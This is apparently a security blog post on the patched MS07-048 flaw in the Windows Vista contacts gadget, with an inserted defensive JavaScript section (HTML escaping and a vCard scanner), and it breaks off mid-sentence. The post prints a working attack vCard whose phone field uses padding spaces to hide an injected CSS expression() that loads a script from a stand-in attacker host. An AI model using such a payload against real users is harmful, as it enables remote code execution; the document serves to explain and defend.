Vista Gadget Patches in MS07-048

Among the items patched in August by Microsoft were bugs in several Sidebar Gadgets included as part of Windows Vista. The advisory lists the RSS, contact, and weather gadgets as vulnerable to remote code execution.

Windows Vista Gadgets are described by Microsoft as "mini applications." This is something of a misnomer. At their simplest, they are locally-hosted web applications that bundle all of their HTML, JavaScript, and other resources in a directory. The application that actually hosts a gadget is therefore IE7, or, in Microsoft's own words, gadgets "[use] the functionality of the Microsoft HTML (MSHTML) runtime, [and] are not limited by the standard browser security model."

Removing the standard browser security model means a gadget can call any code available locally or remotely. Local ActiveX controls, shell commands, and executables may all be launched by a gadget, and, as will also be demonstrated, remotely-hosted executables can be downloaded to the machine and then run.

The vulnerability in the contacts gadget is cross-site scripting through any of a contact's phone number fields: importing a specially-crafted contact file and then viewing the contact in the gadget results in code execution. This was to be one of the points in a talk at Defcon by Aviv Raff, and a video demonstration of the attack has been made public. Since the bug is now patched, we thought we'd show just how the attack works.

In the folder for the contact gadget is the file contact.html. The vulnerable version contains the following line of code, which inserts each of the phone numbers for the contact into the gadget HTML view:

newCell.innerHTML = "";

Each phone number field is placed into an HTML tag with no filtering or escaping; this is as basic a cross-site scripting vulnerability as you can get.

First, you must convince your victim to add your vCard. An example card is shown below, with long lines broken by backslash:

BEGIN:VCARD
VERSION:3.0
FN:Inspector Gadget
TEL;type=HOME:(512) 555 - 1212\
                                            ' \
style='c:expression(document.all[document.all.length-1]\
.src="http://myevilhackerspace.com/adodb.js")
END:VCARD

One thing to point out is that the run of spaces between the telephone number and the injected style attribute pushes the attack out of view when the contact is opened in the Vista contact manager. Up to three lines of JavaScript could be embedded in one contact file, since the home, work, and mobile phone numbers are all open to the same attack; conveniently, one injected script file is enough.
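As an added illustration, not code from the original post or from the contact gadget itself, the JavaScript below shows the unfiltered string-building pattern described above beside an escaped version, plus a small vCard reader that unfolds RFC 2426 continuation lines and flags TEL values carrying markup, which is the check a mail or contact gateway could apply before a card ever reaches the gadget. The span/title layout in renderPhoneVulnerable and the sample card are assumptions constructed for the example; the page does not reproduce the gadget's exact markup.

```javascript
// Added example; not from the original post or from the Windows Contacts gadget.
// The <span title=...> layout below is an assumption: the page does not show the
// gadget's exact markup, only that phone fields reach innerHTML unfiltered.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the five characters that can change meaning inside HTML text or a
// quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the phone string is concatenated straight into markup that
// is then assigned to innerHTML. A single quote in the value ends the title
// attribute, so the remainder becomes attributes of the attacker's choosing.
function renderPhoneVulnerable(phone) {
  return "<span title='" + phone + "'>" + phone + "</span>";
}

// Hardened form: the value is escaped before it touches markup, so quotes and
// angle brackets are inert. In a live DOM, textContent and setAttribute avoid
// string building altogether.
function renderPhoneSafe(phone) {
  const safe = escapeHtml(phone);
  return "<span title='" + safe + "'>" + safe + "</span>";
}

// Minimal vCard 3.0 reader. RFC 2426 folds long lines by continuing them on a
// line that starts with a space or tab, so unfold first, then pull TEL values.
function vcardTelValues(text) {
  const unfolded = text.replace(/\r?\n[ \t]/g, "");
  const tels = [];
  for (const line of unfolded.split(/\r?\n/)) {
    const m = /^TEL(?:;[^:]*)?:(.*)$/i.exec(line);
    if (m) tels.push(m[1]);
  }
  return tels;
}

// Pre-import check: a phone number needs digits, spaces and a little punctuation.
// Anything else (quotes, angle brackets, "expression(") is treated as injected markup.
const PHONE_CHARS = /^[0-9+()\-.\s#*x]*$/i; // x for extensions, e.g. "555-1212 x12"

function suspiciousTelValues(text) {
  return vcardTelValues(text).filter((tel) => !PHONE_CHARS.test(tel));
}

// Constructed sample card (not the one from the post): the HOME number carries a
// quote-and-style payload, folded across two lines the way a real vCard may be.
const SAMPLE_VCARD = [
  "BEGIN:VCARD",
  "VERSION:3.0",
  "FN:Inspector Gadget",
  "TEL;type=HOME:(512) 555 - 1212                              '",
  "  style='c:expression(alert(1))",
  "TEL;type=WORK:(512) 555 - 1213",
  "END:VCARD",
].join("\r\n");

// Runs the scanner over the sample and renders any flagged value both ways so
// the difference between the vulnerable and escaped markup is visible.
function demo() {
  const flagged = suspiciousTelValues(SAMPLE_VCARD);
  return {
    flagged,
    vulnerableMarkup: flagged.map(renderPhoneVulnerable),
    safeMarkup: flagged.map(renderPhoneSafe),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node. The scanner is deliberately strict: a legitimate number never needs a quote, an equals sign or a colon, so rejecting anything outside the phone character set costs nothing and catches every variant of this injection, not just the style/expression form shown on this page.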

The embedded style attribute uses a CSS expression() to evaluate a line of JavaScript, which causes IE7 to download the script. This is done abusing the
